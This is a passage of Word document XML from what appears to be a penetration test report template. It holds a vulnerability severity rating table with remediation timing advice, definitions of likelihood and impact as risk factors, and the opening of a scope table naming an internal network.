              </w:rPr>
              <w:t>7.0-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>8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8AB5E5" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="113" w:right="399"/>
              <w:jc w:val="both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z w:val="21"/>
              </w:rPr>
              <w:t>Exploitation is</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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more</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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difficult but could</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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cause</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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elevated</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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privileges</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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and potentially a loss of data or downtime. It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w:rsidRPr="00A04586" w14:paraId="3AA816F7" w14:textId="77777777" w:rsidTr="00A04586">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="057D87A6" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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3BC9A3A7" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="128"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="419807EC" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0074C2CD" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center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pacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>4.0-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>6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A61F2B0" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="115" w:right="261"/>
              <w:jc w:val="both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z w:val="21"/>
              </w:rPr>
              <w:t>Vulnerabilities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exist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but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are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not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exploitable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or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require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extra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steps</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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such as social engineering. It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w:rsidRPr="00A04586" w14:paraId="51BECFFB" w14:textId="77777777" w:rsidTr="00A04586">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00AE50"/>
          </w:tcPr>
          <w:p w14:paraId="5D85DC94" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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</w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="736C1000" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="129"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13AEC1F8" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32540536" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center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pacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0.1-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>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C58B258" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="113" w:right="282"/>
              <w:jc w:val="both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z w:val="21"/>
              </w:rPr>
              <w:t>Vulnerabilities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are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non-exploitable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but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would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reduce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an</w:t>
            </w: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organization’s attack surface. It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w:rsidRPr="00A04586" w14:paraId="3E900189" w14:textId="77777777" w:rsidTr="00A04586">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="006EC0"/>
          </w:tcPr>
          <w:p w14:paraId="203DAD3F" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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</w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="792C144A" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B1342E3" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CF9B670" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="102"/>
              <w:jc w:val="center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pacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D8B477" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="114" w:right="93"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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exists.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:spacing w:val="36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Additional</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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information</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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is</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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>provided</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">regarding items noticed during testing, strong controls, and additional </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3597C979" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586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14:paraId="1B190598" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="Risk_Factors"/>
      <w:bookmarkStart w:id="5" w:name="_bookmark8"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F85B82" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is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measured</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>two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</w:rPr>
        <w:t>factors:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Likelihood</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DB420D" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7181AC8F" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="Likelihood"/>
      <w:bookmarkStart w:id="7" w:name="_bookmark9"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Likelihood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5E0DD" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="136"/>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Likelihood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measures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the</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>potential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</w:rPr>
        <w:t>of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a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vulnerability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being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exploited.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Ratings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are</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>given</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the difficulty of the attack, the available tools, attacker skill level, and client environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40503BF4" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6118C5EC" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="Impact"/>
      <w:bookmarkStart w:id="9" w:name="_bookmark10"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9A550" w14:textId="2593F039" w:rsidR="00A04586" w:rsidRPr="00BE0BDD" w:rsidRDefault="00A04586" w:rsidP="00BE0BDD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="136"/>
        <w:ind w:left="239"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Impact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measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the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potential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vulnerability’s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effect</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>on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operations,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including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confidentiality,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>integrity, and availability of client systems and/or data, reputational harm, and financial loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196ACFB2" w14:textId="77777777" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F6F14A" w14:textId="3BBF18FB" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc136520520"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scope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4171"/>
        <w:gridCol w:w="2467"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A04586" w14:paraId="2568C4D8" w14:textId="77777777" w:rsidTr="00A04586">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7355C7FA" w14:textId="0F11AAD3" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE5B0B7" w14:textId="70B6E20F" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Subnet/IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52B92FBA" w14:textId="06C94D23" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Assessed on</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w14:paraId="514C7727" w14:textId="77777777" w:rsidTr="00A04586">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F5456E1" w14:textId="19E84D5A" w:rsidR="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
            <w:r>
              <w:t>Internal Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
